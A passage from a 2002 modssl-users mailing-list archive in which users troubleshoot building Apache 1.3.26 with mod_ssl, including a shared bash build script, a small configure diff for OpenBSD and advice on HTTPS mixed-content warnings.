          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GYVSTF00.94H for ; Sun, 7 Jul 2002
          14:44:03 +0100 
Message-ID: <3D2845A2.9000604@itaction.co.uk>
Date: Sun, 07 Jul 2002 14:44:02 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: startssl means nothing.
References: <08496641-912A-11D6-BE87-00306548FDCC@infinitevisions.ws>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

All startssl does in the apachectl script is run httpd with -DSSL, this 
activates any directives in httpd.conf that are between  
 so if you have not got an appropriately patched 
httpd.conf then it wont do anything.

It looks as if you're using the with-apxs method to build libssl, that 
is you're building against the precompiled rpm of apache, in this method 
the httpd.conf  would not get touched i dont think, or maybe it alters 
conf/httpd.conf-dist.

the patch script under mod_sslxxxxx/pkg.sslcfg/sslcfg.patch should add 
the bits in that you need - including the Listen 443 directive that is 
missing.

But my advice is that for security reasons you should start with the 
source trees of apache 1.3.26 and mod_ssl 2.8.10 - use the first method, 
in which mod_ssl patches the apache source tree, and build apache 
yourself. The rpm version you have is subject to a security advisory.


Mark-Nathaniel Weisman wrote:

> Hello List:
>   I'm kinda stuck here so I figured I'd try the list to see if I can 
> get any movement. I've got my local server certificate created, I've 
> even created a ca.key so that I can sign my own certs. I've installed 
> the following on my redhat 6.2 webserver:
>     apache-1.3.22-5.6
>     apache-devel-1.3.23-15
>     openssl-0.9.5a-7.6
>     mod_ssl-2.8.7-6
>   I've used only rpm files with this install. I've installed all three 
> packages with their dependancies, the openssl and mod_ssl were 
> compiled from source. However, two things did not happen,
>  1. There were no changes made to my httpd.conf file?
>  2. My httpd script does not recognize startssl as an option.
>  3. Port 443 is not open on the box even if I set a VirtualHost 
> directive.
>
> Any ideas?
>
> His Faithful Servant,
> Mark
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 01:17:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA10035; Mon, 8 Jul 2002 01:16:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mars.mab.ch id BAA09855; Mon, 8 Jul 2002 01:15:37 +0200 (MET DST)
From: Sylvain.Maret@e-xpertsolutions.com
Received: from donald.e-xpert.e-xpertsolutions.com (unverified) by mars.mab.ch
 (Content Technologies SMTPRS 4.2.10) with ESMTP id  for ;
 Mon, 8 Jul 2002 01:00:23 +0200
Subject: Sylvain Maret/GVA/CH/E-Xpertsolutions is out of the office.
To: modssl-users@modssl.org
Message-ID: 
Date: Mon, 8 Jul 2002 01:00:22 +0200
MIME-Version: 1.0
Content-type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sylvain.Maret@e-xpertsolutions.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I will be out of the office starting  05.07.2002 and will not return until
15.07.2002.

I will respond to your message when I return.





-----------------------------------------------------------------
DISCLAIMER
This email and any files transmitted with it, including replies
and forwarded copies (which may contain alterations)
subsequently transmitted from the Company, are confidential
and solely for the use of the intended recipient. It may contain
material protected by attorney-client privilege. The contents
do not represent the opinion of e-Xpert Solutions SA except
to the extent that it relates to their official business.

If you are not the intended recipient or the person responsible
for delivering to the intended recipient, be advised that you
have received this email in error and that any use is strictly
prohibited. If you are not the intended recipient, please advise
the sender by return e-mail, then delete this message and any
attachments.

e-Xpert Solutions SA: info@e-xpertsolutions.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 18:50:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA05197; Mon, 8 Jul 2002 18:49:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA05079; Mon, 8 Jul 2002 18:48:30 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BED804CE6E2; Mon,  8 Jul 2002 18:48:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3E3B228836; Mon,  8 Jul 2002 18:46:24 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id RAA28925; Mon, 8 Jul 2002 17:49:08 +0200 (MET DST)
Date: Mon, 8 Jul 2002 17:49:08 +0200 (MET DST)
Message-Id: <200207081549.RAA28925@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Security Information! (PR#731)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Di Vincenzo Renzo
Version: 2.8.5
OS: windows 2000 advanced server
Submission from: (NULL) (194.184.159.70)


I Use windows 2000 Advanced server + Apache 1.3.22 + tomcat 4.0.3 + mod_jk
1.1.0.
When i connect via HTTPS whith MSIE 5.00.29 i get "Security Information!"
error.
I get this random and my pages haven't "NonSecure Items".
The detail of message is: "This page contains secure and NonSecure items. Do you
want display the NonSecure Items (Yes/No/Moreinfo)"
What is the reason?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 18:50:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA05200; Mon, 8 Jul 2002 18:49:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA05076; Mon, 8 Jul 2002 18:48:29 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AE86C4CE5F1; Mon,  8 Jul 2002 18:48:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id ED14A286D2; Mon,  8 Jul 2002 18:46:20 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id RAA28172; Mon, 8 Jul 2002 17:42:08 +0200 (MET DST)
Date: Mon, 8 Jul 2002 17:42:08 +0200 (MET DST)
Message-Id: <200207081542.RAA28172@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] compile fails (OpenBSD 3.0, mod_ssl/Apache 1.3.26) (PR#730)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Denis Chatelain
Version: 2.8.10-1.3.26
OS: OpenBSD 3.0
Submission from: (NULL) (193.252.202.117)


Apache fails to compile with the mod_ssl 2.8.10-1.3.26 patch (I might do
something wrong somewhere, but it's easier to suspect somebody else :).
It looks for openssl and ssleay in bin, apps, but not sbin, which seems the
default location for the two programs on an openbsd 3.0 box.

Here's the diff between the original pkg.sslmod/libssl.module and my
modifications to have it work:

346,350d345
<             if [ -f "$SSL_BASE/sbin/$name" ]; then
<                 SSL_PROGRAM="$SSL_BASE/sbin/$name"
<                 SSL_BINDIR='$(SSL_BASE)/sbin'
<                 break;
<             fi

It affected the patch for Apache 1.3.24 also if I remember well :\
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 18:50:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA05209; Mon, 8 Jul 2002 18:49:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA05083; Mon, 8 Jul 2002 18:48:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DC1724CE740; Mon,  8 Jul 2002 18:48:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 48CA928830; Mon,  8 Jul 2002 18:45:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.hblindustries.com id RAA25639; Mon, 8 Jul 2002 17:15:52 +0200 (MET DST)
Received: from www.hblindustries.com (www.hblindustries.com [64.84.19.47])
	by www.hblindustries.com (8.11.6/8.11.2) with ESMTP id g68FCfg13188
	for ; Mon, 8 Jul 2002 08:12:41 -0700
Date: Mon, 8 Jul 2002 08:12:41 -0700 (PDT)
From: New Disorder Records 
X-X-Sender:  
To: 
Subject: apache_1.3.26
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: New Disorder Records 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

is anyone else having problems compiling apache_1.3.26 with mod_ssl?  I'm 
on a redhat 7.2 box, and mod_ssl just erases my src/makefile in the apache 
directory.  Not erases, but all that's created is a blank header.  After I 
try, I have to wipe the directory and untar apache again so that I can 
compile it without mod_ssl.  Any suggestions?



-- 
New Disorder Records "you've heard of us now, so shut up and buy the damn 
Sacrilicious CD" - www.newdisorder.com
Pirx the Pilot: One of the top three Structuralist punk rock bands in the 
country.  www.pirxthepilot.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 19:06:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA07033; Mon, 8 Jul 2002 19:05:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from owl4.owl.co.uk id TAA06962; Mon, 8 Jul 2002 19:04:21 +0200 (MET DST)
Received: from ferret.owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk
 (Rockliffe SMTPRA 4.5.6) with ESMTP id  for ;
 Mon, 8 Jul 2002 18:04:13 +0100
Message-Id: <5.1.0.14.0.20020708180218.00b03ff0@pophost.owl.co.uk>
X-Sender: colmm@pophost.owl.co.uk
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Mon, 08 Jul 2002 18:03:47 +0100
To: modssl-users@modssl.org
From: Colm McCartan 
Subject: Re: [BugDB] Security Information! (PR#731)
In-Reply-To: <200207081549.RAA28925@opensource.ee.ethz.ch>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Colm McCartan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 17:49 08/07/2002 +0200, you wrote:
>I Use windows 2000 Advanced server + Apache 1.3.22 + tomcat 4.0.3 + mod_jk
>1.1.0.
>When i connect via HTTPS whith MSIE 5.00.29 i get "Security Information!"
>error.
>I get this random and my pages haven't "NonSecure Items".
>The detail of message is: "This page contains secure and NonSecure items. 
>Do you
>want display the NonSecure Items (Yes/No/Moreinfo)"
>What is the reason?

I believe that quite often this is because pages across an ssl connection 
request things like images from a normal http connection - move all your 
resources to https links if this is the case.


c

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 19:24:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09015; Mon, 8 Jul 2002 19:23:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from wellington.cnchost.com id TAA08997; Mon, 8 Jul 2002 19:22:48 +0200 (MET DST)
Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged))
	by wellington.cnchost.com
	id NAA15597; Mon, 8 Jul 2002 13:22:34 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: RE: [BugDB] Security Information! (PR#731)
Date: Mon, 8 Jul 2002 10:22:33 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <5.1.0.14.0.20020708180218.00b03ff0@pophost.owl.co.uk>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This can also happend when you have a frame (or iframe ) with no src.



> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Colm McCartan
> Sent: Monday, July 08, 2002 10:04 AM
> To: modssl-users@modssl.org
> Subject: Re: [BugDB] Security Information! (PR#731)
>
>
> At 17:49 08/07/2002 +0200, you wrote:
> >I Use windows 2000 Advanced server + Apache 1.3.22 + tomcat
> 4.0.3 + mod_jk
> >1.1.0.
> >When i connect via HTTPS whith MSIE 5.00.29 i get "Security Information!"
> >error.
> >I get this random and my pages haven't "NonSecure Items".
> >The detail of message is: "This page contains secure and
> NonSecure items.
> >Do you
> >want display the NonSecure Items (Yes/No/Moreinfo)"
> >What is the reason?
>
> I believe that quite often this is because pages across an ssl connection
> request things like images from a normal http connection - move all your
> resources to https links if this is the case.
>
>
> c
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul  8 20:37:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16213; Mon, 8 Jul 2002 20:37:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from inet.codep.cz id UAA15985; Mon, 8 Jul 2002 20:35:18 +0200 (MET DST)
Received: from jesip ([212.90.236.163])
	(authenticated (0 bits))
	by inet.codep.cz (8.11.6/8.11.6) with ESMTP id g68HZ9x25351
	for ; Mon, 8 Jul 2002 19:35:10 +0200
From: =?iso-8859-2?Q?Jan_=A9kola?= 
To: 
Subject: RE: apache_1.3.26
Date: Mon, 8 Jul 2002 20:35:00 +0200
Message-ID: <000401c226ae$307df000$0100000a@jesip>
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0005_01C226BE.F406C000"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-2?Q?Jan_=A9kola?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C226BE.F406C000
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit

Yes, use this script to compile Apache & mod_ssl & mod_perl & php. If
you dont want it all comment it. I use this with complete success on RH
7.2, after unzip, config and make go to apache* dir and run make install

Jan Skola

> -----Original Message-----
> From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]
> On Behalf Of New Disorder Records
> Sent: Monday, July 08, 2002 5:13 PM
> To: modssl-users@modssl.org
> Subject: apache_1.3.26
> 
> is anyone else having problems compiling apache_1.3.26 with mod_ssl?
I'm
> on a redhat 7.2 box, and mod_ssl just erases my src/makefile in the
apache
> directory.  Not erases, but all that's created is a blank header.
After I
> try, I have to wipe the directory and untar apache again so that I can
> compile it without mod_ssl.  Any suggestions?
> 
> 
> 
> --
> New Disorder Records "you've heard of us now, so shut up and buy the
damn
> Sacrilicious CD" - www.newdisorder.com
> Pirx the Pilot: One of the top three Structuralist punk rock bands in
the
> country.  www.pirxthepilot.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


------=_NextPart_000_0005_01C226BE.F406C000
Content-Type: application/octet-stream;
	name="makeapache"
Content-Disposition: attachment;
	filename="makeapache"
Content-Transfer-Encoding: quoted-printable

#!/bin/bash=0A=
=0A=
VERSION_APACHE=3D1.3.26=0A=
VERSION_MOD_SSL=3D2.8.10=0A=
VERSION_MOD_PERL=3D1.27=0A=
VERSION_PHP=3D4.2.1=0A=
=0A=
# clean=0A=
#########################################################################=
############################=0A=
clean()=0A=
{=0A=
    rm -rf apache_${VERSION_APACHE}=0A=
    rm -rf mod_ssl-${VERSION_MOD_SSL}-${VERSION_APACHE}=0A=
    rm -rf mod_perl-${VERSION_MOD_PERL}=0A=
    rm -rf php-${VERSION_PHP}=0A=
}=0A=
=0A=
# unzip=0A=
#########################################################################=
############################=0A=
unzip_all()=0A=
{=0A=
    gunzip -c apache_${VERSION_APACHE}.tar.gz | tar xvf - > /dev/nul=0A=
    gunzip -c mod_ssl-${VERSION_MOD_SSL}-${VERSION_APACHE}.tar.gz | tar =
xvf - > /dev/nul=0A=
    gunzip -c mod_perl-${VERSION_MOD_PERL}.tar.gz | tar xvf - > /dev/nul=0A=
    bunzip2 -c php-${VERSION_PHP}.tar.bz2 | tar xvf - > /dev/nul=0A=
}=0A=
=0A=
# mod_ssl=0A=
#########################################################################=
############################=0A=
config_mod_ssl()=0A=
{=0A=
    cd mod_ssl-${VERSION_MOD_SSL}-${VERSION_APACHE}=0A=
=0A=
    SSL_BASE=3DSYSTEM \=0A=
    EAPI_MM=3DSYSTEM \=0A=
    ./configure \=0A=
	--with-apache=3D../apache_${VERSION_APACHE}=0A=
=0A=
    cd ..=0A=
}=0A=
=0A=
# mod_perl=0A=
#########################################################################=
############################=0A=
config_mod_perl()=0A=
{=0A=
    cd mod_perl-${VERSION_MOD_PERL}=0A=
=0A=
    perl Makefile.PL \=0A=
	EVERYTHING=3D1 \=0A=
        APACHE_SRC=3D../apache_${VERSION_APACHE}/src \=0A=
        USE_APACI=3D1 \=0A=
        PREP_HTTPD=3D1 \=0A=
        DO_HTTPD=3D1=0A=
=0A=
    cd ..=0A=
}=0A=
=0A=
make_mod_perl()=0A=
{=0A=
    cd mod_perl-${VERSION_MOD_PERL}=0A=
=0A=
    make=0A=
    make install=0A=
    =0A=
    cd ..=0A=
}=0A=
=0A=
# PHP=0A=
#########################################################################=
############################=0A=
config_php()=0A=
{=0A=
    cd php-${VERSION_PHP}=0A=
=0A=
#        --with-apxs=3D/usr/sbin/apxs \=0A=
=0A=
    EXTRA_LIBS=3D-L/usr/local/freetds/lib \=0A=
    ./configure \=0A=
	i386-redhat-linux \=0A=
        --with-apache=3D../apache_${VERSION_APACHE} \=0A=
        --prefix=3D/usr \=0A=
        --exec-prefix=3D/usr \=0A=
        --bindir=3D/usr/bin \=0A=
        --sbindir=3D/usr/sbin \=0A=
        --sysconfdir=3D/etc \=0A=
        --datadir=3D/usr/share \=0A=
        --includedir=3D/usr/include \=0A=
        --libdir=3D/usr/lib \=0A=
        --libexecdir=3D/usr/libexec \=0A=
        --localstatedir=3D/var \=0A=
        --sharedstatedir=3D/usr/com \=0A=
        --mandir=3D/usr/share/man \=0A=
        --infodir=3D/usr/share/info \=0A=
        --prefix=3D/usr \=0A=
        --with-config-file-path=3D/etc \=0A=
        --disable-debug \=0A=
        --enable-pic \=0A=
        --disable-rpath \=0A=
        --enable-inline-optimization \=0A=
        --with-bz2 \=0A=
        --with-db3 \=0A=
        --with-exec-dir=3D/usr/bin \=0A=
        --with-gd \=0A=
        --with-gdbm \=0A=
        --with-gettext \=0A=
        --with-jpeg-dir=3D/usr \=0A=
        --with-mm \=0A=
        --with-openssl \=0A=
        --with-png \=0A=
        --with-regex=3Dsystem \=0A=
        --with-ttf \=0A=
        --with-zlib \=0A=
        --with-layout=3DGNU \=0A=
        --enable-debugger \=0A=
        --enable-ftp \=0A=
        --enable-magic-quotes \=0A=
        --enable-safe-mode \=0A=
        --enable-sockets \=0A=
        --enable-sysvsem \=0A=
        --enable-sysvshm \=0A=
        --enable-track-vars \=0A=
        --enable-yp \=0A=
        --enable-wddx \=0A=
        --without-mysql \=0A=
        --without-unixODBC \=0A=
        --without-oracle \=0A=
        --without-oci8 \=0A=
        --with-pspell \=0A=
        --with-xml \=0A=
        --with-sybase=3D/usr/local/freetds=0A=
=0A=
    cd ..=0A=
}=0A=
=0A=
make_php()=0A=
{=0A=
    cd php-${VERSION_PHP}=0A=
=0A=
    make=0A=
    make install=0A=
=0A=
    cd ..=0A=
}=0A=
=0A=
# Apache=0A=
#########################################################################=
############################=0A=
config_apache()=0A=
{=0A=
    cd apache_${VERSION_APACHE}=0A=
=0A=
#    --prefix=3D/etc/httpd \=0A=
#    --exec-prefix=3D/usr \=0A=
#    --bindir=3D/usr/bin \=0A=
#    --sbindir=3D/usr/sbin \=0A=
#    --mandir=3D/usr/share/man \=0A=
#    --sysconfdir=3D/etc/httpd/conf \=0A=
#    --includedir=3D/usr/include/apache \=0A=
#    --libexecdir=3D/usr/lib/apache \=0A=
#    --datadir=3D/var/www \=0A=
#    --iconsdir=3D/var/www/icons \=0A=
#    --htdocsdir=3D/var/www/html \=0A=
#    --manualdir=3D/var/www/html/manual \=0A=
#    --cgidir=3D/var/www/cgi-bin \=0A=
#    --localstatedir=3D/var \=0A=
#    --runtimedir=3D/var/run \=0A=
#    --logfiledir=3D/var/log/httpd \=0A=
#    --proxycachedir=3D/var/cache/httpd \=0A=
=0A=
    SSL_BASE=3DSYSTEM \=0A=
    EAPI_MM=3DSYSTEM \=0A=
    EXTRA_LIBS=3D-L/usr/local/freetds/lib \=0A=
    ./configure \=0A=
        --enable-module=3Dssl \=0A=
        --activate-module=3Dsrc/modules/perl/libperl.a \=0A=
        --enable-module=3Dperl \=0A=
        --activate-module=3Dsrc/modules/php4/libphp4.a \=0A=
	--enable-module=3Dphp4 \=0A=
        --enable-module=3Dauth_dbm \=0A=
        --enable-module=3Dall \=0A=
        --enable-shared=3Dmax \=0A=
        --disable-shared=3Dperl \=0A=
	--disable-shared=3Dssl \=0A=
	--disable-shared=3Dphp4 \=0A=
        --enable-rule=3DEAPI \=0A=
        --disable-rule=3DWANTHSREGEX \=0A=
        --with-perl=3D/usr/bin/perl \=0A=
        --enable-suexec \=0A=
        --suexec-docroot=3D/var/www \=0A=
        --suexec-caller=3Dapache \=0A=
	--prefix=3D/etc/httpd \=0A=
	--exec-prefix=3D/usr \=0A=
        --bindir=3D/usr/bin \=0A=
        --sbindir=3D/usr/sbin \=0A=
        --mandir=3D/usr/share/man \=0A=
        --sysconfdir=3D/etc/httpd/conf \=0A=
        --includedir=3D/usr/include/apache \=0A=
        --libexecdir=3D/usr/lib/apache \=0A=
        --datadir=3D/var/www \=0A=
        --iconsdir=3D/var/www/icons \=0A=
        --htdocsdir=3D/var/www/html \=0A=
        --manualdir=3D/var/www/html/manual \=0A=
        --cgidir=3D/var/www/cgi-bin \=0A=
        --localstatedir=3D/var \=0A=
        --runtimedir=3D/var/run \=0A=
        --logfiledir=3D/var/log/httpd \=0A=
        --proxycachedir=3D/var/cache/httpd \=0A=
=0A=
    cd ..=0A=
}=0A=
=0A=
make_apache()=0A=
{=0A=
    cd apache_${VERSION_APACHE}=0A=
=0A=
    EXTRA_LIBS=3D-L/usr/local/freetds/lib \=0A=
    make=0A=
    =0A=
    cd ..    =0A=
}=0A=
=0A=
=0A=
# support=0A=
#########################################################################=
############################=0A=
=0A=
do_make()=0A=
{=0A=
    config_mod_ssl=0A=
    config_mod_perl=0A=
    make_mod_perl=0A=
    config_php=0A=
    make_php=0A=
    config_apache=0A=
    make_apache=0A=
}=0A=
=0A=
# main=0A=
#########################################################################=
############################=0A=
case "$1" in=0A=
    clean)=0A=
	clean=0A=
	;;=0A=
    unzip)=0A=
	unzip_all=0A=
	;;=0A=
    make)=0A=
        do_make=0A=
	;;=0A=
    *)=0A=
	echo $"Usage: do { clean | unzip | make }"=0A=
	exit 1=0A=
esac=0A=

------=_NextPart_000_0005_01C226BE.F406C000--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  9 06:09:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA21056; Tue, 9 Jul 2002 06:08:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA20919; Tue, 9 Jul 2002 06:08:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B867E4CE744; Tue,  9 Jul 2002 03:03:08 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 216282873B; Mon,  8 Jul 2002 21:20:20 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.hblindustries.com id UAA16868; Mon, 8 Jul 2002 20:43:49 +0200 (MET DST)
Received: from www.hblindustries.com (www.hblindustries.com [64.84.19.47])
	by www.hblindustries.com (8.11.6/8.11.2) with ESMTP id g68Iebg16494
	for ; Mon, 8 Jul 2002 11:40:37 -0700
Date: Mon, 8 Jul 2002 11:40:37 -0700 (PDT)
From: New Disorder Records 
X-X-Sender:  
To: 
Subject: RE: apache_1.3.26
In-Reply-To: <000401c226ae$307df000$0100000a@jesip>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: New Disorder Records 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

well, that's a lot more than I needed.  I think the key is somewhere in 
the 

SSL_BASE=SYSTEM thing.

I have openssl installed, this is redhat, but when I set SSL_BASE=SYSTEM, 
I still get the error:

Error: Cannot find SSL binaries under /usr/local/ssl

when I run configure in apache.  I don't know what binaries it's looking 
for, but there is a bin directory under /usr/local/ssl.

-Ernst

On Mon, 8 Jul 2002, [iso-8859-2] Jan ©kola wrote:

> Yes, use this script to compile Apache & mod_ssl & mod_perl & php. If
> you dont want it all comment it. I use this with complete success on RH
> 7.2, after unzip, config and make go to apache* dir and run make install
> 
> Jan Skola
> 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]
> > On Behalf Of New Disorder Records
> > Sent: Monday, July 08, 2002 5:13 PM
> > To: modssl-users@modssl.org
> > Subject: apache_1.3.26
> > 
> > is anyone else having problems compiling apache_1.3.26 with mod_ssl?
> I'm
> > on a redhat 7.2 box, and mod_ssl just erases my src/makefile in the
> apache
> > directory.  Not erases, but all that's created is a blank header.
> After I
> > try, I have to wipe the directory and untar apache again so that I can
> > compile it without mod_ssl.  Any suggestions?
> > 
> > 
> > 
> > --
> > New Disorder Records "you've heard of us now, so shut up and buy the
> damn
> > Sacrilicious CD" - www.newdisorder.com
> > Pirx the Pilot: One of the top three Structuralist punk rock bands in
> the
> > country.  www.pirxthepilot.com
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> 

-- 
New Disorder Records "you've heard of us now, so shut up and buy the damn 
Sacrilicious CD" - www.newdisorder.com
Pirx the Pilot: One of the top three Structuralist punk rock bands in the 
country.  www.pirxthepilot.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  9 06:25:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA22753; Tue, 9 Jul 2002 06:24:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
